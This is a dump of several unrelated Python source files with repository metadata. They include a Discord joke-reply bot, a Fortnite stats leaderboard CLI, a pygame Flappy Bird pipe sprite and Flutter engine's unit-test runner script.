# "Hydrodynamics of High-Speed Marine Vehicles" Odd M. Faltinsen, chapter 6.8 p 200
if (Fn > max(Fnh)):
raise ValueError("Fnh is out of interpolation range Fnh = %0.2f", Fn)
fun_handle = interpolate.interp1d(Fnh, K) # use interpolation function returned by `interp1d`
K = fun_handle(Fn)
return K
# import matplotlib.pyplot as plt
# import numpy as np
# xnew = np.linspace(0, 15, num=100)
# ynew = np.array([ calc_CLFreeSurfaceEffect(xnew[i],1) for i in range(len(xnew))])
#
# plt.xlabel('Fn')
# plt.ylabel('K')
# plt.title('Effect of foil submerge on lift')
# plt.plot(xnew, ynew, marker=".", linestyle="-")
# plt.grid(True)
# plt.show() | 32.922222 | 117 | 0.646979 |
4a21115a40bed721b290c8d29fe601c34a6dc43d | 1,148 | py | Python | test_joke.py | renatojobal/DiscordBotJokeTester | dbdcb4c160913e44e3703e24dd848f8970a92b74 | [
"MIT"
] | null | null | null | test_joke.py | renatojobal/DiscordBotJokeTester | dbdcb4c160913e44e3703e24dd848f8970a92b74 | [
"MIT"
] | 1 | 2021-04-30T00:36:45.000Z | 2021-05-01T00:48:20.000Z | test_joke.py | renatojobal/DiscordBotJokeTester | dbdcb4c160913e44e3703e24dd848f8970a92b74 | [
"MIT"
] | null | null | null | from command import Command
import random
from discord import Embed
from discord.message import Message
jokes_answer = [
'Mas o menos tu bromita 7/10',
'¡Oigan todos! Master bromas aqui presente',
'¿Acaso aprendiste de Jucaritas? 10/10',
'Uff +1000 lince',
'Se te cayeron tus zapatos de payaso',
'¿Fue chiste? Pa reirme',
'Bangaran',
'Tatai guambra mushpa',
'Me alegraste el día',
'¡Tu Joke-Fu es realmente impresionante!',
'¿Sacas tus chiste del libreto de Auron Play?',
'No entendí esa referencfia',
'Don comediante'
]
class Test_Joke(Command):
async def on_triggered(self, message: Message):
"""
Return a message of a joke
:return:Embed message
"""
answer = self.get_answer_to_joke()
await message.channel.send(
embed=self.get_embed(answer)
)
def get_answer_to_joke(self):
return random.choice(jokes_answer)
def get_embed(self, answer: str):
embed = Embed(
title=answer,
message=answer,
description="Un gatito :3")
return embed
| 24.425532 | 51 | 0.615854 |
4a21124eb385390cd0fa8424e3590ca25ed5785a | 15,352 | py | Python | main.py | jnicol17/Fortnite-Enhanced-Leaderboards | bf7cca990f0338637b12e332cc00b2783d8f581f | [
"MIT"
] | null | null | null | main.py | jnicol17/Fortnite-Enhanced-Leaderboards | bf7cca990f0338637b12e332cc00b2783d8f581f | [
"MIT"
] | null | null | null | main.py | jnicol17/Fortnite-Enhanced-Leaderboards | bf7cca990f0338637b12e332cc00b2783d8f581f | [
"MIT"
] | null | null | null | import requests
import config
import json
import re
from time import sleep
from operator import itemgetter
# Solo leaderboards
solo_leaderboards = {}
# These leaderboards will be populated with lists of dictionaries of player
# stats that can then be sorted and displayed
group_leaderboards = {
"LIFETIME STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"LIFETIME SOLO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"LIFETIME DUO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"LIFETIME SQUAD STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"CURRENT SEASON SOLO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"CURRENT SEASON DUO STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
},
"CURRENT SEASON SQUAD STATS":{
"Matches Played": [],
"Wins": [],
"Win %": [],
"Kills": [],
"K/D": []
}
}
field_map_solo = {
"Matches Played": "matches",
"Wins": "top1",
"Win %": "winRatio",
"Top 10s": "top10",
"Top 25s": "top25",
"Kills": "kills",
"K/D": "kd"
}
field_map_duo = {
"Matches Played": "matches",
"Wins": "top1",
"Win %": "winRatio",
"Top 5s": "top5",
"Top 12s": "top12",
"Kills": "kills",
"K/D": "kd"
}
field_map_squad = {
"Matches Played": "matches",
"Wins": "top1",
"Win %": "winRatio",
"Top 3s": "top3",
"Top 6s": "top6",
"Kills": "kills",
"K/D": "kd"
}
group_map = {
"LIFETIME STATS": "lifeTimeStats",
"LIFETIME SOLO STATS": "p2",
"LIFETIME DUO STATS": "p10",
"LIFETIME SQUAD STATS": "p9",
"CURRENT SEASON SOLO STATS": "curr_p2",
"CURRENT SEASON DUO STATS": "curr_p10",
"CURRENT SEASON SQUAD STATS": "curr_p9"
}
input_commands = [
"--exit",
"--players",
"--stats",
"--help",
"--group",
"--remove"
]
# will store raw json data from fortnite tracker for all Players
# format will be { player name : fortnitetracker data }
raw_data = {}
# initialize stuff, right now just goes straight to main menu
def main():
welcome_message()
# regex parsing the input, we divide commands by two delimeters,
# commas and spaces (any number of them)
command = re.split("[, ]+", input("Enter Command: "))
# we only want to exit when --exit is entered as the only command
# the or condition means that we don't accept commands such as
# "--exit rtedsadasd" because the length of the command is > 1
# conditions are only met when command[0] is "--exit" and the
# length is 1
while(command[0] != "--exit" or len(command) > 1):
# display help message
if (command[0] == "--help" and len(command) == 1):
help_message()
# display a list of players currently stored in dictionary
elif (command[0] == '--players' and len(command) == 1):
print("printing a list of players")
for player in solo_leaderboards:
print(player)
# display stats for player with name in command[1], if the player
# is not in the system, query FortniteTracker API. If nothing is
# returned then return an error message. If the player is in the
# system already, pull their existing data (not stored outside of
# runtime so not a big deal)
elif (command[0] == '--stats'and len(command) == 2):
print("printing stats for " + command[1])
if (add_players(command[1]) == 1):
print_solo_stats(command[1])
# display group leaderboards based on input parameters
elif (command[0] == '--group'):
# using lazy evalutation here to prevent errors
if (len(command) > 1 and command[1] == '--players'):
if (len(command) > 2 and command[2] == '--remove'):
group = list(solo_leaderboards)
if (group == []):
print("No players to remove")
else:
#for key in solo_leaderboards.keys():
#group.append(key)
for i in range (3, len(command)):
if (command[i] in group):
group.remove(command[i])
else:
print(command[i] + " is not being stored")
print_group_stats(group)
elif (len(command) == 2 and command[1] == '--players'):
print_group_stats_all()
else:
print("Invalid command, enter '--help' for valid commands")
else:
group = []
for i in range (1, len(command)):
if (add_players(command[i]) == 1):
group.append(command[i])
print_group_stats(group)
# remove a players data from storage, not sure why this would be
# super useful because data is not stored outside of runtime but
# good to have the option
elif (command[0] == '--remove'):
for i in range (1, len(command)):
if (command[i] not in solo_leaderboards):
print(command[i] + " is not being stored")
else:
remove_from_solo(command[i])
remove_from_group(command[i])
# if the first input is not a valid command, display an error message
else:
#if (command[0] not in input_commands):
print("Invalid command, enter '--help' for valid commands")
#print(command)
command = re.split("[, ]+", input("Enter Command: "))
# Message that the user sees on startup
def welcome_message():
print("Welcome to Fortnite Enhanced Leaderboards by James Nicol")
print("Enter '--help' for a list of commands")
# help message to explain all available commands with examples
def help_message():
print("Commands:")
print("\n##############################################################\n")
print("'--exit' - Exit the program")
print("\n##############################################################\n")
print("'--players' - view a list of all players current stored", end = "")
print("in the system")
print("\n##############################################################\n")
print("'--stats p_name' - Display stats for player with username p_name")
print("\n##############################################################\n")
print("'--group p_n1, p_n2' - Display group leaderboards ", end = "")
print("for 1 or more players, in this case p_n1 and p_n2")
print("\n##############################################################\n")
print("'--group --players' - Display group leaderboards for all ", end = "")
print("players current stored in the system")
print("\n##############################################################\n")
print("'--remove p_n1, p_n2' - Remove one or more players from ", end = "")
print("the system, in this case p_n1 and p_n2")
print("\n##############################################################\n")
print("'--group --players --remove p_n1' - Display group ", end = "")
print("leaderboards for all players current stored in the ", end = "")
print("system except for p_n1")
print("NOTE: This command does not remove p_n1 from the system")
print("\n##############################################################\n")
# add or remove a players data from the group leaderboards
def add_players(names):
names = names.replace(" ", "")
name = names.split(",")
#print(name)
for username in name:
request_string = "https://api.fortnitetracker.com/v1/profile/pc/" + username
response = requests.get(request_string, headers = config.headers)
#print(response.text)
data = response.json()
#print(username)
if ('error' in data and data['error'] == "Player Not Found"):
print(username + " is not a valid name")
return 0
else:
if(username not in solo_leaderboards):
populate_solo_leaderboards(username, data)
populate_group_leaderboards(username, data)
#print_solo_stats(username)
sleep(1)
else:
print(username + " already exists")
return 1
# populate the group leaderboard dictionary
def populate_solo_leaderboards(username, data):
print("populating leaderboards for " + username)
raw_data[username] = data
solo_leaderboards[username] = {}
if ("lifetimeStats" in data):
lifetime_stats = data["lifeTimeStats"]
solo_leaderboards[username]["LIFETIME STATS"] = {
"Matches Played": lifetime_stats[7]["value"],
"Wins": lifetime_stats[8]["value"],
"Win %": lifetime_stats[9]["value"].strip("%"),
"Kills": lifetime_stats[10]["value"],
"K/D": lifetime_stats[11]["value"]
}
for key in group_map.keys():
if (key != "LIFETIME STATS"):
if(group_map[key] in data["stats"]):
solo_leaderboards[username][key] = {}
if (group_map[key] == "p2" or group_map[key] == "curr_p2"):
for fields in field_map_solo:
solo_leaderboards[username][key][fields] = data["stats"][group_map[key]][field_map_solo[fields]]["value"]
elif (group_map[key] == "p10" or group_map[key] == "curr_p10"):
for fields in field_map_duo:
solo_leaderboards[username][key][fields] = data["stats"][group_map[key]][field_map_duo[fields]]["value"]
elif (group_map[key] == "p9" or group_map[key] == "curr_p9"):
for fields in field_map_squad:
solo_leaderboards[username][key][fields] = data["stats"][group_map[key]][field_map_squad[fields]]["value"]
# print the solo stats for a given username
def print_solo_stats(username):
for headers in solo_leaderboards[username]:
print(headers)
for keys, values in solo_leaderboards[username][headers].items():
print(keys + ": " + values)
def populate_group_leaderboards(username, data):
# add the new member
# Need to add lifetime stats separately because they are not indexed the
# same way in the data json that we receive from FortniteTracker
group_leaderboards["LIFETIME STATS"]["Matches Played"].append({"name" : username, "value" : int(data["lifeTimeStats"][7]["value"])})
group_leaderboards["LIFETIME STATS"]["Wins"].append({"name" : username, "value" : int(data["lifeTimeStats"][8]["value"])})
group_leaderboards["LIFETIME STATS"]["Win %"].append({"name": username, "value": float(data["lifeTimeStats"][9]["value"].strip("%"))})
group_leaderboards["LIFETIME STATS"]["Kills"].append({"name": username, "value": int(data["lifeTimeStats"][10]["value"])})
group_leaderboards["LIFETIME STATS"]["K/D"].append({"name": username, "value": float(data["lifeTimeStats"][11]["value"])})
#print(group_leaderboards)
# For all other stats we can automate the collection using a mapping of
# our labels to the data labels
for key in group_map.keys():
if (key != "LIFETIME STATS"):
if (group_map[key] in data["stats"]):
group_leaderboards[key]["Matches Played"].append({
"name": username,
"value": int(data["stats"][group_map[key]]["matches"]["value"])
})
group_leaderboards[key]["Wins"].append({
"name": username,
"value": int(data["stats"][group_map[key]]["top1"]["value"])
})
group_leaderboards[key]["Win %"].append({
"name": username,
"value": float(data["stats"][group_map[key]]["winRatio"]["value"])
})
group_leaderboards[key]["Kills"].append({
"name": username,
"value": int(data["stats"][group_map[key]]["kills"]["value"])
})
group_leaderboards[key]["K/D"].append({
"name": username,
"value": float(data["stats"][group_map[key]]["kd"]["value"])
})
#print(group_leaderboards)
# sort the group Leaderboards
for key in group_map.keys():
group_leaderboards[key]["Matches Played"] = sorted(
group_leaderboards[key]["Matches Played"],
key=itemgetter('value'),
reverse=True
)
group_leaderboards[key]["Wins"] = sorted(
group_leaderboards[key]["Wins"],
key=itemgetter('value'),
reverse=True
)
group_leaderboards[key]["Win %"] = sorted(
group_leaderboards[key]["Win %"],
key = itemgetter('value'),
reverse=True
)
group_leaderboards[key]["Kills"] = sorted(
group_leaderboards[key]["Kills"],
key = itemgetter('value'),
reverse=True
)
group_leaderboards[key]["K/D"] = sorted(
group_leaderboards[key]["K/D"],
key = itemgetter('value'),
reverse=True
)
def print_group_stats(usernames):
for headers in group_leaderboards:
print(headers)
for keys, values in group_leaderboards[headers].items():
print(keys)
for element in values:
if (element["name"] in usernames):
print(element["name"] + ": " + str(element["value"]))
def print_group_stats_all():
for headers in group_leaderboards:
print(headers)
for keys, values in group_leaderboards[headers].items():
print(keys)
for element in values:
print(element["name"] + ": " + str(element["value"]))
def remove_from_solo(user):
#remove user from solo leaderboards
del solo_leaderboards[user]
def remove_from_group(user):
#remove user from group leaderboards
for headers in group_leaderboards:
for keys in group_leaderboards[headers]:
for i in range(0, len(group_leaderboards[headers][keys])):
#print(group_leaderboards[headers][keys][i])
if (group_leaderboards[headers][keys][i]['name'] == user):
print(group_leaderboards[headers][keys])
del group_leaderboards[headers][keys][i]
print(group_leaderboards[headers][keys])
break
#program runs here
if __name__ == '__main__':
main()
# Next Steps
# Error checking
# Command line commands
# Output formatting
# KNOWN ISSUES
# if the user hasnt played in the current season they have no stats for curr_p2
| 37.812808 | 138 | 0.536152 |
4a2112bf7ac96fb04c7a2552160ade4f762a5768 | 203 | py | Python | config.py | Tartar-san/montage.ai | c699dfaf300fdca69f3dbc5d63fae9f00a26ca40 | [
"Apache-2.0"
] | 3 | 2018-07-30T01:39:25.000Z | 2021-07-08T16:50:17.000Z | config.py | Tartar-san/montage.ai | c699dfaf300fdca69f3dbc5d63fae9f00a26ca40 | [
"Apache-2.0"
] | null | null | null | config.py | Tartar-san/montage.ai | c699dfaf300fdca69f3dbc5d63fae9f00a26ca40 | [
"Apache-2.0"
] | 1 | 2021-07-08T17:01:08.000Z | 2021-07-08T17:01:08.000Z | CHUNKS_PATH = "data/chunks"
SCRAPPED_VIDEOS = "data/scrapped_videos"
CHUNKS_SCRAPPED_VIDEOS = "data/chunks_scrapped_videos"
CHUNKS_SCRAPPED_VIDEOS_AUDIO = "data/chunks_scrapped_videos_audio"
OUT_FPS = 24 | 40.6 | 66 | 0.847291 |
4a21145fa14be10a2349065703ab83c5aec7a6ce | 180 | py | Python | app/messages.py | WaqasKhwaja/FastAPI | 55013127a9b3f0d737eb77ce1f9f7ca04ed4285d | [
"MIT"
] | null | null | null | app/messages.py | WaqasKhwaja/FastAPI | 55013127a9b3f0d737eb77ce1f9f7ca04ed4285d | [
"MIT"
] | null | null | null | app/messages.py | WaqasKhwaja/FastAPI | 55013127a9b3f0d737eb77ce1f9f7ca04ed4285d | [
"MIT"
] | null | null | null | """Friendly messsages"""
from fastapi import APIRouter
router = APIRouter()
@router.get('/hello')
async def hello():
"""You look like a whole clown right now. 🤡"""
pass | 16.363636 | 50 | 0.661111 |
4a21167b24372af2437f66b8d6a7b198cc5f6996 | 1,448 | py | Python | flappy_bird/terrain_generation.py | mehmeterenballi/Flappy-Bird-Try | 66190b1826e8604ccb9b0389c4210a700d227d4b | [
"MIT"
] | null | null | null | flappy_bird/terrain_generation.py | mehmeterenballi/Flappy-Bird-Try | 66190b1826e8604ccb9b0389c4210a700d227d4b | [
"MIT"
] | null | null | null | flappy_bird/terrain_generation.py | mehmeterenballi/Flappy-Bird-Try | 66190b1826e8604ccb9b0389c4210a700d227d4b | [
"MIT"
] | null | null | null | import pygame as pg
class Pipes(pg.sprite.Sprite):
def __init__(self, pos, *groups):
self.groups = groups[0], groups[1]
self.bird = groups[2]
pg.sprite.Sprite.__init__(self, self.groups)
upper_colon = pg.image.load('pipe-green.png').convert_alpha()
lower_colon = pg.transform.flip(upper_colon, 0, 1).convert_alpha()
upper_colon_rect = upper_colon.get_rect()
lower_colon_rect = upper_colon.get_rect()
vertical_gap = 150
self.image = pg.Surface(
(upper_colon_rect.width, upper_colon_rect.height + upper_colon_rect.height + vertical_gap))
self.image.blit(lower_colon, (0, 0))
self.image.blit(upper_colon, (0, upper_colon_rect.height + vertical_gap))
self.image.set_colorkey((0, 0, 0))
self.image.convert_alpha()
self.mask = pg.mask.from_surface(self.image)
del upper_colon_rect
del lower_colon_rect
del upper_colon
del lower_colon
self.rect = self.image.get_rect()
self.pos = pos.copy()
self.rect.center = self.pos
def update(self, time):
self.pos[0] -= 100 * time
collided = pg.sprite.spritecollide(self, self.bird, False, pg.sprite.collide_mask)
for c in collided:
quit()
if self.rect.right < 0:
self.kill()
self.rect.center = self.pos
| 30.166667 | 104 | 0.601519 |
4a21171e2dac8cede114d31e9dda2761f0a3213b | 19,288 | py | Python | testing/run_tests.py | rmarianetti/engine | 33ba62960b78b86899807bafa0361e6bdffc65ea | [
"BSD-3-Clause"
] | 1 | 2019-04-21T12:35:21.000Z | 2019-04-21T12:35:21.000Z | testing/run_tests.py | duanqz/engine | 30063a97ea4a71839411b6488baad13cac41748d | [
"BSD-3-Clause"
] | null | null | null | testing/run_tests.py | duanqz/engine | 30063a97ea4a71839411b6488baad13cac41748d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Copyright 2013 The Flutter Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A top level harness to run all unit-tests in a specific engine build.
"""
import argparse
import glob
import os
import re
import subprocess
import sys
import time
buildroot_dir = os.path.abspath(os.path.join(os.path.realpath(__file__), '..', '..', '..'))
out_dir = os.path.join(buildroot_dir, 'out')
golden_dir = os.path.join(buildroot_dir, 'flutter', 'testing', 'resources')
fonts_dir = os.path.join(buildroot_dir, 'flutter', 'third_party', 'txt', 'third_party', 'fonts')
roboto_font_path = os.path.join(fonts_dir, 'Roboto-Regular.ttf')
dart_tests_dir = os.path.join(buildroot_dir, 'flutter', 'testing', 'dart',)
font_subset_dir = os.path.join(buildroot_dir, 'flutter', 'tools', 'font-subset')
fml_unittests_filter = '--gtest_filter=-*TimeSensitiveTest*'
def PrintDivider(char='='):
print '\n'
for _ in xrange(4):
print(''.join([char for _ in xrange(80)]))
print '\n'
def RunCmd(cmd, **kwargs):
command_string = ' '.join(cmd)
PrintDivider('>')
print 'Running command "%s"' % command_string
start_time = time.time()
process = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, **kwargs)
process.communicate()
end_time = time.time()
if process.returncode != 0:
PrintDivider('!')
raise Exception('Command "%s" exited with code %d' % (command_string, process.returncode))
PrintDivider('<')
print 'Command run successfully in %.2f seconds: %s' % (end_time - start_time, command_string)
def IsMac():
return sys.platform == 'darwin'
def IsLinux():
return sys.platform.startswith('linux')
def IsWindows():
return sys.platform.startswith(('cygwin', 'win'))
def ExecutableSuffix():
return '.exe' if IsWindows() else ''
def FindExecutablePath(path):
if os.path.exists(path):
return path
if IsWindows():
exe_path = path + '.exe'
if os.path.exists(exe_path):
return exe_path
bat_path = path + '.bat'
if os.path.exists(bat_path):
return bat_path
raise Exception('Executable %s does not exist!' % path)
def RunEngineExecutable(build_dir, executable_name, filter, flags=[], cwd=buildroot_dir):
if filter is not None and executable_name not in filter:
print('Skipping %s due to filter.' % executable_name)
return
executable = FindExecutablePath(os.path.join(build_dir, executable_name))
print('Running %s in %s' % (executable_name, cwd))
test_command = [ executable ] + flags
print(' '.join(test_command))
RunCmd(test_command, cwd=cwd)
def RunCCTests(build_dir, filter):
print("Running Engine Unit-tests.")
# Not all of the engine unit tests are designed to be run more than once.
non_repeatable_shuffle_flags = [
"--gtest_shuffle",
]
shuffle_flags = non_repeatable_shuffle_flags + [
"--gtest_repeat=2",
]
RunEngineExecutable(build_dir, 'client_wrapper_glfw_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'common_cpp_core_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'common_cpp_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'client_wrapper_unittests', filter, shuffle_flags)
# https://github.com/flutter/flutter/issues/36294
if not IsWindows():
RunEngineExecutable(build_dir, 'embedder_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'embedder_proctable_unittests', filter, shuffle_flags)
else:
RunEngineExecutable(build_dir, 'flutter_windows_unittests', filter, non_repeatable_shuffle_flags)
RunEngineExecutable(build_dir, 'client_wrapper_windows_unittests', filter, shuffle_flags)
flow_flags = ['--gtest_filter=-PerformanceOverlayLayer.Gold']
if IsLinux():
flow_flags = [
'--golden-dir=%s' % golden_dir,
'--font-file=%s' % roboto_font_path,
]
RunEngineExecutable(build_dir, 'flow_unittests', filter, flow_flags + shuffle_flags)
# TODO(44614): Re-enable after https://github.com/flutter/flutter/issues/44614 has been addressed.
# RunEngineExecutable(build_dir, 'fml_unittests', filter, [ fml_unittests_filter ] + shuffle_flags)
RunEngineExecutable(build_dir, 'runtime_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'tonic_unittests', filter, shuffle_flags)
if not IsWindows():
# https://github.com/flutter/flutter/issues/36295
RunEngineExecutable(build_dir, 'shell_unittests', filter, shuffle_flags)
# https://github.com/google/googletest/issues/2490
RunEngineExecutable(build_dir, 'android_external_view_embedder_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'jni_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'platform_view_android_delegate_unittests', filter, shuffle_flags)
# The image release unit test can take a while on slow machines.
RunEngineExecutable(build_dir, 'ui_unittests', filter, shuffle_flags + ['--timeout=90'])
RunEngineExecutable(build_dir, 'testing_unittests', filter, shuffle_flags)
# The accessibility library only supports Mac for now.
if IsMac():
RunEngineExecutable(build_dir, 'accessibility_unittests', filter, shuffle_flags)
# These unit-tests are Objective-C and can only run on Darwin.
if IsMac():
RunEngineExecutable(build_dir, 'flutter_channels_unittests', filter, shuffle_flags)
RunEngineExecutable(build_dir, 'flutter_desktop_darwin_unittests', filter, non_repeatable_shuffle_flags)
# https://github.com/flutter/flutter/issues/36296
if IsLinux():
RunEngineExecutable(build_dir, 'txt_unittests', filter, shuffle_flags)
if IsLinux():
RunEngineExecutable(build_dir, 'flutter_linux_unittests', filter, non_repeatable_shuffle_flags)
RunEngineExecutable(build_dir, 'flutter_glfw_unittests', filter, non_repeatable_shuffle_flags)
def RunEngineBenchmarks(build_dir, filter):
print("Running Engine Benchmarks.")
RunEngineExecutable(build_dir, 'shell_benchmarks', filter)
RunEngineExecutable(build_dir, 'fml_benchmarks', filter)
RunEngineExecutable(build_dir, 'ui_benchmarks', filter)
if IsLinux():
RunEngineExecutable(build_dir, 'txt_benchmarks', filter)
def SnapshotTest(build_dir, dart_file, kernel_file_output, verbose_dart_snapshot):
print("Generating snapshot for test %s" % dart_file)
dart = os.path.join(build_dir, 'dart-sdk', 'bin', 'dart')
frontend_server = os.path.join(build_dir, 'gen', 'frontend_server.dart.snapshot')
flutter_patched_sdk = os.path.join(build_dir, 'flutter_patched_sdk')
test_packages = os.path.join(dart_tests_dir, '.packages')
assert os.path.exists(dart)
assert os.path.exists(frontend_server)
assert os.path.exists(flutter_patched_sdk)
assert os.path.exists(test_packages)
snapshot_command = [
dart,
frontend_server,
'--enable-experiment=non-nullable',
'--no-sound-null-safety',
'--sdk-root',
flutter_patched_sdk,
'--incremental',
'--target=flutter',
'--packages',
test_packages,
'--output-dill',
kernel_file_output,
dart_file
]
if verbose_dart_snapshot:
RunCmd(snapshot_command, cwd=buildroot_dir)
else:
try:
subprocess.check_output(snapshot_command, cwd=buildroot_dir)
except subprocess.CalledProcessError as error:
# CalledProcessError's string doesn't print the output. Print it before
# the crash for easier inspection.
print('Error occurred from the subprocess, with the output:')
print(error.output)
raise
assert os.path.exists(kernel_file_output)
def RunDartTest(build_dir, dart_file, verbose_dart_snapshot, multithreaded, enable_observatory=False):
kernel_file_name = os.path.basename(dart_file) + '.kernel.dill'
kernel_file_output = os.path.join(out_dir, kernel_file_name)
SnapshotTest(build_dir, dart_file, kernel_file_output, verbose_dart_snapshot)
command_args = []
if not enable_observatory:
command_args.append('--disable-observatory')
command_args += [
'--use-test-fonts',
kernel_file_output
]
if multithreaded:
threading = 'multithreaded'
command_args.insert(0, '--force-multithreading')
else:
threading = 'single-threaded'
print("Running test '%s' using 'flutter_tester' (%s)" % (kernel_file_name, threading))
RunEngineExecutable(build_dir, 'flutter_tester', None, command_args)
def RunPubGet(build_dir, directory):
print("Running 'pub get' in the tests directory %s" % dart_tests_dir)
pub_get_command = [
os.path.join(build_dir, 'dart-sdk', 'bin', 'pub'),
'get'
]
RunCmd(pub_get_command, cwd=directory)
def EnsureDebugUnoptSkyPackagesAreBuilt():
variant_out_dir = os.path.join(out_dir, 'host_debug_unopt')
ninja_command = [
'autoninja',
'-C',
variant_out_dir,
'flutter/sky/packages'
]
# Attempt running Ninja if the out directory exists.
# We don't want to blow away any custom GN args the caller may have already set.
if os.path.exists(variant_out_dir):
RunCmd(ninja_command, cwd=buildroot_dir)
return
gn_command = [
os.path.join(buildroot_dir, 'flutter', 'tools', 'gn'),
'--runtime-mode',
'debug',
'--unopt',
'--no-lto',
]
RunCmd(gn_command, cwd=buildroot_dir)
RunCmd(ninja_command, cwd=buildroot_dir)
def EnsureJavaTestsAreBuilt(android_out_dir):
"""Builds the engine variant and the test jar containing the JUnit tests"""
ninja_command = [
'autoninja',
'-C',
android_out_dir,
'flutter/shell/platform/android:robolectric_tests'
]
# Attempt running Ninja if the out directory exists.
# We don't want to blow away any custom GN args the caller may have already set.
if os.path.exists(android_out_dir):
RunCmd(ninja_command, cwd=buildroot_dir)
return
assert android_out_dir != "out/android_debug_unopt", "%s doesn't exist. Run GN to generate the directory first" % android_out_dir
# Otherwise prepare the directory first, then build the test.
gn_command = [
os.path.join(buildroot_dir, 'flutter', 'tools', 'gn'),
'--android',
'--unoptimized',
'--runtime-mode=debug',
'--no-lto',
]
RunCmd(gn_command, cwd=buildroot_dir)
RunCmd(ninja_command, cwd=buildroot_dir)
def EnsureIosTestsAreBuilt(ios_out_dir):
"""Builds the engine variant and the test dylib containing the XCTests"""
ninja_command = [
'autoninja',
'-C',
ios_out_dir,
'ios_test_flutter'
]
# Attempt running Ninja if the out directory exists.
# We don't want to blow away any custom GN args the caller may have already set.
if os.path.exists(ios_out_dir):
RunCmd(ninja_command, cwd=buildroot_dir)
return
assert ios_out_dir != "out/ios_debug_sim_unopt", "%s doesn't exist. Run GN to generate the directory first" % ios_out_dir
# Otherwise prepare the directory first, then build the test.
gn_command = [
os.path.join(buildroot_dir, 'flutter', 'tools', 'gn'),
'--ios',
'--unoptimized',
'--runtime-mode=debug',
'--no-lto',
'--simulator'
]
RunCmd(gn_command, cwd=buildroot_dir)
RunCmd(ninja_command, cwd=buildroot_dir)
def AssertExpectedJavaVersion():
"""Checks that the user has Java 8 which is the supported Java version for Android"""
EXPECTED_VERSION = '1.8'
# `java -version` is output to stderr. https://bugs.java.com/bugdatabase/view_bug.do?bug_id=4380614
version_output = subprocess.check_output(['java', '-version'], stderr=subprocess.STDOUT)
match = bool(re.compile('version "%s' % EXPECTED_VERSION).search(version_output))
message = "JUnit tests need to be run with Java %s. Check the `java -version` on your PATH." % EXPECTED_VERSION
assert match, message
def AssertExpectedXcodeVersion():
"""Checks that the user has a recent version of Xcode installed"""
EXPECTED_MAJOR_VERSION = ['11', '12']
version_output = subprocess.check_output(['xcodebuild', '-version'])
match = re.match("Xcode (\d+)", version_output)
message = "Xcode must be installed to run the iOS embedding unit tests"
assert match.group(1) in EXPECTED_MAJOR_VERSION, message
def RunJavaTests(filter, android_variant='android_debug_unopt'):
"""Runs the Java JUnit unit tests for the Android embedding"""
AssertExpectedJavaVersion()
android_out_dir = os.path.join(out_dir, android_variant)
EnsureJavaTestsAreBuilt(android_out_dir)
embedding_deps_dir = os.path.join(buildroot_dir, 'third_party', 'android_embedding_dependencies', 'lib')
classpath = map(str, [
os.path.join(buildroot_dir, 'third_party', 'android_tools', 'sdk', 'platforms', 'android-30', 'android.jar'),
os.path.join(embedding_deps_dir, '*'), # Wildcard for all jars in the directory
os.path.join(android_out_dir, 'flutter.jar'),
os.path.join(android_out_dir, 'robolectric_tests.jar')
])
test_class = filter if filter else 'io.flutter.FlutterTestSuite'
command = [
'java',
'-Drobolectric.offline=true',
'-Drobolectric.dependency.dir=' + embedding_deps_dir,
'-classpath', ':'.join(classpath),
'-Drobolectric.logging=stdout',
'org.junit.runner.JUnitCore',
test_class
]
RunCmd(command)
def RunObjcTests(ios_variant='ios_debug_sim_unopt'):
"""Runs Objective-C XCTest unit tests for the iOS embedding"""
AssertExpectedXcodeVersion()
ios_out_dir = os.path.join(out_dir, ios_variant)
EnsureIosTestsAreBuilt(ios_out_dir)
ios_unit_test_dir = os.path.join(buildroot_dir, 'flutter', 'testing', 'ios', 'IosUnitTests')
# Avoid using xcpretty unless the following can be addressed:
# - Make sure all relevant failure output is printed on a failure.
# - Make sure that a failing exit code is set for CI.
# See https://github.com/flutter/flutter/issues/63742
command = [
'xcodebuild '
'-sdk iphonesimulator '
'-scheme IosUnitTests '
"-destination platform='iOS Simulator,name=iPhone 8' "
'test '
'FLUTTER_ENGINE=' + ios_variant
]
RunCmd(command, cwd=ios_unit_test_dir, shell=True)
def RunDartTests(build_dir, filter, verbose_dart_snapshot):
# This one is a bit messy. The pubspec.yaml at flutter/testing/dart/pubspec.yaml
# has dependencies that are hardcoded to point to the sky packages at host_debug_unopt/
# Before running Dart tests, make sure to run just that target (NOT the whole engine)
EnsureDebugUnoptSkyPackagesAreBuilt()
# Now that we have the Sky packages at the hardcoded location, run `pub get`.
RunEngineExecutable(build_dir, os.path.join('dart-sdk', 'bin', 'pub'), None, flags=['get'], cwd=dart_tests_dir)
dart_observatory_tests = glob.glob('%s/observatory/*_test.dart' % dart_tests_dir)
dart_tests = glob.glob('%s/*_test.dart' % dart_tests_dir)
if 'release' not in build_dir:
for dart_test_file in dart_observatory_tests:
if filter is not None and os.path.basename(dart_test_file) not in filter:
print("Skipping %s due to filter." % dart_test_file)
else:
print("Testing dart file %s with observatory enabled" % dart_test_file)
RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, True, True)
RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, False, True)
for dart_test_file in dart_tests:
if filter is not None and os.path.basename(dart_test_file) not in filter:
print("Skipping %s due to filter." % dart_test_file)
else:
print("Testing dart file %s" % dart_test_file)
RunDartTest(build_dir, dart_test_file, verbose_dart_snapshot, True)
